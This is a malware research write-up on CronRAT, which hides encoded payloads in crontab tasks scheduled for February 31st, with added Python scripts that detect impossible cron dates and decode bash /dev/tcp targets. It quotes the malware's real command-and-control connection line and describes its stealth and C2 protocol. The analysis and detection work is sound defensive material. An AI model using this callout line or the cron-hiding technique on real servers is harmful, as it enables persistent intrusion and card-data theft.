# CronRAT malware hides behind February 31st

**sansec.io/research/cronrat**

24th November 2021

[Web Skimming / Sansec Threat Research](https://sansec.io/research)

**In the run-up to Black Friday, Sansec discovered a sophisticated threat that is packed with never-seen stealth techniques. This malware, dubbed “CronRAT”, hides in the Linux calendar system on February 31st. It is not recognized by other security vendors and is likely to stay undetected on critical infrastructure for the coming months. CronRAT enables server-side Magecart data theft which bypasses browser-based security solutions.**

At this time of year we typically see a surge in eCommerce attacks and new malware. Last week we analyzed [a clever malware attacking online stores](https://sansec.io/research/ecommerce-malware-linux-avp), and today we expose another, much more sophisticated threat. It is a Remote Access Trojan (RAT) and we have named it CronRAT.

Sansec found CronRAT to be present on multiple online stores, among them a nation’s largest outlet. Because of its novel execution, we had to rewrite part of our [eComscan](https://sansec.io/ecomscan) algorithm in order to detect it. CronRAT is currently [undetected by other security vendors](https://www.virustotal.com/gui/file/b46e51a2e757f4d75f1a1fff1165c6a0503b687db6c7e672021dcaa9bedf2d88/detection).

CronRAT’s main feat is hiding in the calendar subsystem of Linux servers (“cron”) on a nonexistent day. This way, it will not attract attention from server administrators.
And many security products do not scan the Linux cron system. CronRAT facilitates persistent control over an eCommerce server. Sansec has studied several cases where the presence of CronRAT led to the injection of payment skimmers (aka [Magecart](https://sansec.io/what-is-magecart)) in server-side code.

Sansec director of threat research Willem de Groot observes:

> Digital skimming is moving from the browser to the server and this is yet another example. Most online stores have only implemented browser-based defenses, and criminals capitalize on the unprotected back-end. Security professionals should really consider the full attack surface.

CronRAT’s stealth capabilities pose a serious threat to Linux eCommerce servers:

- Fileless execution
- Timing modulation
- Anti-tampering checksums
- Controlled via binary, obfuscated protocol
- Launches tandem RAT in separate Linux subsystem
- Control server disguised as “Dropbear SSH” service
- Payload hidden in legitimate CRON scheduled task names

## Technical analysis

CronRAT adds a number of tasks to crontab with a curious date specification:

```
52 23 31 2 3
```

These lines are syntactically valid, but would generate a run time error when executed. However, this will never happen as they are scheduled to run on February 31st. Instead, the actual malware code is hidden in the task names and is constructed using several layers of compression and base64 decoding. The actual payload (see [raw](https://gist.github.com/gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f) and [annotated](https://gist.github.com/gwillem/fbe3e6b98e2e10d7f1f271ca4b6e813f#file-cronrat-annotated-sh) copy) is a sophisticated Bash program that features self-destruction, timing modulation and a custom binary protocol to communicate with a foreign control server.
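As an added example (this is not Sansec's eComscan code and nothing from the CronRAT payload), the Python below scans crontab text for entries whose day-of-month/month fields name only dates that do not exist on any calendar, which is exactly how a February 31st task hides in plain sight, and adds a cheap heuristic for an encoded payload in the command part. The sample crontab is constructed; its fifth line copies only the `52 23 31 2 3` date specification from the article and the rest of that line is made up. One caveat a defender should keep in mind: Vixie cron runs an entry when either day field matches once both day-of-month and day-of-week are restricted, so the scanner reports whether the weekday field is restricted rather than promising the entry is dormant.

```python
import re

# Highest day number each month can have; February keeps 29 so a leap-day
# entry is not flagged.  Any (month, day) above these limits never occurs.
DAYS_IN_MONTH = {1: 31, 2: 29, 3: 31, 4: 30, 5: 31, 6: 30,
                 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}

# minute  hour  day-of-month  month  day-of-week  command
CRON_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")

# A long run of base64 alphabet characters in the command part is a cheap
# indicator that the entry carries an encoded payload rather than a plain command.
BASE64_RUN = re.compile(r"[A-Za-z0-9+/=]{40,}")


def expand_field(field, lo, hi):
    """Expand one cron field ('*', '7', '1,15', '1-5', '*/10', '1-31/2') into a set.
    Unparsable or out-of-range parts are dropped rather than raising, so a malformed
    field degrades to "nothing scheduled".  Names such as 'feb' or 'wed' are not handled."""
    values = set()
    for part in field.split(","):
        step = 1
        if "/" in part:
            part, step_text = part.split("/", 1)
            if not step_text.isdigit() or int(step_text) == 0:
                continue
            step = int(step_text)
        if part == "*":
            start, end = lo, hi
        elif "-" in part:
            a, b = part.split("-", 1)
            if not (a.isdigit() and b.isdigit()):
                continue
            start, end = int(a), int(b)
        elif part.isdigit():
            start = int(part)
            end = hi if step > 1 else start      # 'N/step' runs from N up to the maximum
        else:
            continue
        values.update(v for v in range(start, end + 1, step) if lo <= v <= hi)
    return values


def impossible_dates(dom_field, month_field):
    """Return (impossible_pairs, all_impossible) for a day-of-month/month pair.
    impossible_pairs lists scheduled (month, day) combinations that exist on no calendar;
    all_impossible is True when every scheduled combination is such a pair."""
    days = expand_field(dom_field, 1, 31)
    months = expand_field(month_field, 1, 12)
    if not days or not months:
        return [], False
    bad = sorted((m, d) for m in months for d in days if d > DAYS_IN_MONTH[m])
    return bad, len(bad) == len(days) * len(months)


def scan_crontab(text):
    """Return one finding per entry whose date fields name only nonexistent dates."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@"):
            continue          # comments and @reboot-style shortcuts have no date fields
        match = CRON_LINE.match(line)
        if not match:
            continue          # environment assignments such as MAILTO="" do not match
        _minute, _hour, dom, month, dow, command = match.groups()
        bad, all_bad = impossible_dates(dom, month)
        if not all_bad:
            continue
        findings.append({
            "line": lineno,
            "impossible": bad,
            # Vixie cron runs a job when EITHER day field matches once both are
            # restricted, so a restricted weekday means the entry might still fire.
            "dow_restricted": dow != "*",
            "encoded_payload": bool(BASE64_RUN.search(command)),
        })
    return findings


# Constructed sample crontab for the demo; only the "31 2" (February 31st) date
# specification on the fifth line is taken from the article, the rest is made up.
SAMPLE_CRONTAB = """\
# constructed sample, not a real capture
MAILTO=""
0 3 * * * /usr/local/bin/backup.sh
30 4 1,15 * 5 /usr/bin/rotate-logs
52 23 31 2 3 echo Y29uc3RydWN0ZWQgc2FtcGxlIHBheWxvYWQsIG5vdCBhIHJlYWwgY2FwdHVyZQ== | base64 -d
0 0 30-31 2 * /opt/report.sh
0 0 31 4,6 * /opt/quarterly.sh
"""

if __name__ == "__main__":
    for finding in scan_crontab(SAMPLE_CRONTAB):
        print(finding)
```

Run it against the output of `crontab -l` for each user and against `/etc/crontab` and `/etc/cron.d/*` (system crontabs carry an extra user column, which simply becomes the first word of the command and does not affect the date check). An entry scheduled for `31 2` is reported together with whether it still has a weekday on which it could run.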
As one security engineer remarks:

> I thought I had mastered bash, but that script is giving me a headache😅
>
> [— アルミ (@schrotthaufen) November 25, 2021](https://twitter.com/schrotthaufen/status/1463977342666170372?ref_src=twsrc%5Etfw)

Upon launch, it contacts the control server using an uncommon method for TCP communication:

```
eval "exec 3<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || exit_with_code 5
```

This resolves to port `443` on `47.115.46.167`, an Alibaba hosted IP. This service generates a banner for the Dropbear SSH service, which is commonly installed on embedded devices. However, this is clearly a disguise. CronRAT implements a custom binary protocol with random checksums, to avoid detection by firewalls and packet inspectors.

Once a connection with the C&C server is established, CronRAT takes these steps:

1. Discards the fake `SSH-2.0-dropbear_2017.75` banner.
2. Sends a password, the `cio` command and then (presumably) a host identifier.
3. Waits for a `sd` (self-destruct) or `ev` (eval) command from the control server.
4. Sends `prm` command and password/identifier, then receives command parameters for the sidekick RAT.
5. Sends `dwn` command and receives malicious dynamic library.
6. Library is saved to one of these paths: `/dev/shm`, `/run/user/UID`, `/tmp`,
8. Monitors custom command for 5 seconds and, depending on success, sends `ssc`, `ser` or `sun` command.
9. Finishes with `cex` command.

This essentially allows the RAT operator to run any code.

## Coming up

In order to study the control server’s behavior, we wrote a specially crafted RAT client to intercept commands. And we tricked the C2 server into sending us yet another RAT, which manages to embed itself in the Nginx web server process. [Read about NginRAT.](https://sansec.io/research/nginrat)

_We greatly appreciate the help of [Cipriano Groenendal](https://nl.linkedin.com/in/ciprianogroenendal) at [Hypernode](https://www.hypernode.com/) for providing malware samples and valuable analysis._
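The connection line quoted in the technical analysis above hides its target behind a bare 32-bit integer host and an arithmetic port expression. The Python below is added here as an example and is not part of Sansec's research or tooling: it extracts every `/dev/tcp` redirection from a shell script and normalises host and port into the dotted-quad and numeric form that block lists and hunting queries expect. It goes beyond the decimal case on the page by also handling hex and octal integer hosts (which the C resolver accepts in the same way) and bash's `base#digits` port literals. The sample script is constructed: its first line is the one quoted above, the other lines are made-up variants (two use RFC 5737 documentation addresses, one re-encodes the same address in hex). `exit_with_code` is the payload's own function name as quoted and is not defined here.

```python
import ipaddress
import re

# bash's /dev/tcp/<host>/<port> pseudo-device.  The host may be a dotted quad,
# a hostname, or a bare integer (the resolver accepts the 32-bit form); the port
# may be a literal or a $((...)) arithmetic expression such as $((0x1bb)).
DEV_TCP = re.compile(r"/dev/tcp/([^/\s\"']+)/(?:\$\(\(([^)]*)\)\)|([0-9A-Za-z_$#]+))")

# Integer literal forms shared by C's strtol (used by the resolver) and bash arithmetic.
INT_FORMS = [
    (re.compile(r"0[xX][0-9a-fA-F]+"), 16),   # hex
    (re.compile(r"0[0-7]*"), 8),               # octal (and plain "0")
    (re.compile(r"[1-9][0-9]*"), 10),          # decimal
]


def parse_int(text):
    """Parse an integer literal (0x hex, leading-0 octal, decimal, or bash's
    base#digits); return None when the text is not a literal, e.g. a variable."""
    text = text.strip()
    if "#" in text:                                   # bash-only form, e.g. 16#1bb
        base, digits = text.split("#", 1)
        try:
            return int(digits, int(base))
        except ValueError:
            return None
    for pattern, base in INT_FORMS:
        if pattern.fullmatch(text):
            return int(text, base)
    return None


def decode_host(host):
    """Turn an integer-form IPv4 host into dotted-quad text; leave other hosts as-is."""
    if "#" in host:                     # base#digits is bash arithmetic, not a resolver form
        return host
    value = parse_int(host)
    if value is None or value > 0xFFFFFFFF:
        return host                     # dotted quad, hostname, or not an IPv4 value
    return str(ipaddress.IPv4Address(value))


def find_tcp_targets(script):
    """Return (host, port) for every /dev/tcp redirection in a shell script.
    port is None when it cannot be resolved statically (for example a variable)."""
    targets = []
    for match in DEV_TCP.finditer(script):
        host, arith, literal = match.groups()
        port = parse_int(arith if arith is not None else literal)
        targets.append((decode_host(host), port))
    return targets


# Constructed sample: the first line is the connection quoted in the article; the
# rest are made-up variants (RFC 5737 documentation addresses, and the same address
# re-encoded as hex) to exercise the other literal forms.
SAMPLE_SCRIPT = r'''
eval "exec 3<>/dev/tcp/796077735/$((0x1bb))" &>/dev/null || exit_with_code 5
exec 4<>/dev/tcp/192.0.2.10/8080
exec 5<>/dev/tcp/0x2f732ea7/443
exec 6<>/dev/tcp/203.0.113.5/$PORT
'''

if __name__ == "__main__":
    for host, port in find_tcp_targets(SAMPLE_SCRIPT):
        print(host, port)
```

Because `/dev/tcp` is implemented inside bash rather than through a binary on disk, a fileless script can open a connection without ever invoking `curl`, `nc` or `ssh`; scanning scripts and cron task bodies for the pseudo-device path, and normalising the odd integer encodings before comparing against known-bad addresses, closes that gap.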